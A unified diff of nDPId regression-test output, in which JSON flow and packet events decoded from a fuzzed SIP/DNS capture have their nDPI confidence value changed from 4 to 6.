01359{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":2,"flow_last_seen":1120470814189,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":721,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":721,"pkt_l4_len":687,"thread_ts_msec":1120470814189,"pkt":"ADBUADRWAODtAW69CABFAALDa6kAAIARFMHAqAEC1PIhIxPEE8QCr1LWUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMjcxMTExNzUtNDMzMGM5ZDYxOTIuMTY4LjEuMjtycG9ydA0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MTlkYjMxNg0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz6GCkNhbGwtSUQ6IHI5ODU4MTQ3LTQ2NWIwNzUyQDI5ODU4MDUxLTQ2NWIwN2IyDQpDb250YWN0OiBwZWwgPHNpcDozNTEwXzcyM0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9N2QzNjU1OGYzRzM2NzA1MT47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDIgUkVHSVNURVINCkNvbnRlbnQtTGVuZ3RoOiAwDQpBdXRob3JpemF0aW9uOiBEaWdlc3QgdXNlcm5hbWU9InZvaTE4MDYyIixyZWFsbT0ic2lwLmN5YmVyY2l0eS5kayIsdXJpPSJzaXA6MTkyLjE2OC4xLjIiLG5vbmNlPSIxNzAxYjkzMzNlODcxMzJlN2Y3NDdjNTA3MjYzZDkzIixvcGFxdWU9IjE3MDFhMTM1MWY3MDc5NSIsbmM9IhIwMDAwMDAxIixy
ZXNwb25zZT0iMGRmOTZlYjUyOGJiNjMwYTE2ZmQwMjUyNjE4Y2YzY2IiDQpNYXgtRm9yd2FyZHM6IDcwDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQoNCg=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814334,"flow_last_seen":1120470814334,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470814334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1120470814334,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470814334,"pkt":"ADBUADRWAODtAW69CABFAABIa6oAAIARS6fAqAECwKgBAQrwADUANDG\/+BUBAAABAAAAAAAABF9zxXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814334,"flow_last_seen":1120470814334,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470814334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_s?p._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814334,"flow_last_seen":1120470814334,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470814334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_s?p._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":3,"flow_last_seen":1120470814336,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":1120470814336,"pkt":"AODtAW69ADBUAFpWCABFAAFKAABAADcRiuPU8iEjwKgBAhPEE8QBNvufU0lQLzIuMCAxMDAgVHJ5aW5nDQpDYWxsLUlEOiAyOTg1ODE0Ny00NjViMDc1MkAyOTg1YjA1MS00NjViMDdiMg0KQ1NlcTogMiBSRUdJU1RFUg0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWdLMTlkYjMxNg0KVG86IDxzaXA6MzUxMDQ3MjNAc2lyLmN5YmVyY2l0eWtkaz4NClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7cmVjZWl2ZWQ9ODAuMjMwLm4xOS43MDtycG9ydD01MDYwO2JyYW5jaD16OWhHNGJLbnAyNzExMTE3NS00MzMwYzlkNjE5Mi4xNjguMS4yDQpDb250ZW50LUxlbmd0aDogMA0KDQo="} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":2,"flow_last_seen":1120470815395,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470815395,"pkt":"ADBUADRWAODtAW69CABFAABIa6sAAIARS6bAqAECwKgBAQrwADUASDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":528,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470814334,"flow_last_seen":1120470815395,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470815395,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":528,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470814334,"flow_last_seen":1120470815395,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470815395,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":3,"flow_last_seen":1120470817390,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470817390,"pkt":"ADBUADRWAODtAW69CABFAABIa6wAAIARS6XAqAECwKgBAQrwADUANDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470819393,"flow_last_seen":1120470819393,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1120470819393,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":21,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1120470819393,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":17,"thread_ts_msec":1120470819393,"pkt":"ADBUADRWAODtAW69CABFAAAlcwAAAIARS6TAqAECwKgBAQrwABUANDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3libXJjaXR5AmRrAAAhAAE="} 
@@ -1028,113 +1028,113 @@ 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":531,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":9587,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470819393,"pkt":"ADBUADRWAODtAW69JXMAAABIa64AAIARS6PAqAECwKgBAQrwADUANDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831400,"flow_last_seen":1120470831400,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470831400,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1120470831400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470831400,"pkt":"ADBUADRWAODtAW69CABFAABEa7IAAIARS6PAqAECwKgBAQrxADUAMKq2ehcAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAQAwAAQ=="} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831400,"flow_last_seen":1120470831400,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470831400,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16396,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831400,"flow_last_seen":1120470831400,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470831400,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16396,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":2,"flow_last_seen":1120470831402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470831402,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvEAR40yeheAAAABAAEAAAAAATEBMCVzADEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":536,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470831400,"flow_last_seen":1120470831402,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470831402,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":16396,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":536,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470831400,"flow_last_seen":1120470831402,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470831402,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":16396,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831403,"flow_last_seen":1120470831403,"flow_idle_time":620000,"flow_min_l4_payload_len":474,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1120470831403,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","l4_proto":0,"flow_datalink":1,"flow_max_packets":3} 
01075{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1120470831403,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":508,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":508,"pkt_l4_len":474,"thread_ts_msec":1120470831403,"pkt":"ADBUADRWAODtAW69CABFAAHua7MAJXMAFYzAqAEC1PIhIxPEE8QB2oO4UkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMjY5MzY5tDUtNDc5ZTgzZjExOTIuMTY4LjEuMjtycG9ydA0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MTliMDYxNA0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz4NCkNhbGwtSUQ6IDI5ODU4MTQ3LTQ2NWIwNzUyQDI5ODU4MDUxLTQ2NWIwN2IyDQpDb250YWN0OiBwZWwgPHNpcDozNTEwNDcyM0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9N2QzNjU1OGYzMTM2NzA1MT47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDMgUkVHSVNURVINCkNvbnRlbnQtTGVuZ3RoOiAwDQpNYXgtRm9yd2FyZHM6IDcwDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb2wgMi4wLjUxLjE2DQoNCg=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470831516,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1120470831516,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470831516,"pkt":"ADBUADRWAODsAW69CABFAABIa7QAAIARS53AqAECwKgBAQoIADUANBq8DxcBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470831516,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470831516,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470832512,"flow_last_seen":1120470832512,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470832512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1120470832512,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470832512,"pkt":"ADBUADRWAODtAW69CABFAABIa7UAAIARS5zAqAECwKgBAQryADUANBq8DxcBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470832512,"flow_last_seen":1120470832512,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470832512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2802,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470832512,"flow_last_seen":1120470832512,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470832512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2802,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470834515,"flow_last_seen":1120470834515,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470834515,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":18162,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1120470834515,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470834515,"pkt":"ADBUADRWAODtAW69CABFAABIa7YAAIARS5vAqAECwKgBAUbyADUANBq8DxcBAAABRwAAAAAABF9zaXAEX3VkcANzaXAJY3loZXJjaXR5AmRrAAAhAAE="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470834515,"flow_last_seen":1120470834515,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470834515,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":18162,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyhercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470834515,"flow_last_seen":1120470834515,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470834515,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":18162,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cyhercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":2,"flow_last_seen":1120470836517,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470836517,"pkt":"ADBUADRWAODtAW69CABFAABIa7cAAIARS5rAqAECwKgBAQryADUANBq8DxcBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":3,"flow_last_seen":1120470840523,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470840523,"pkt":"ADBUADRWAODtAW69CABFAABIa7gAAIARS5nAqAECwKgBAQryADUANBq8DxcBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 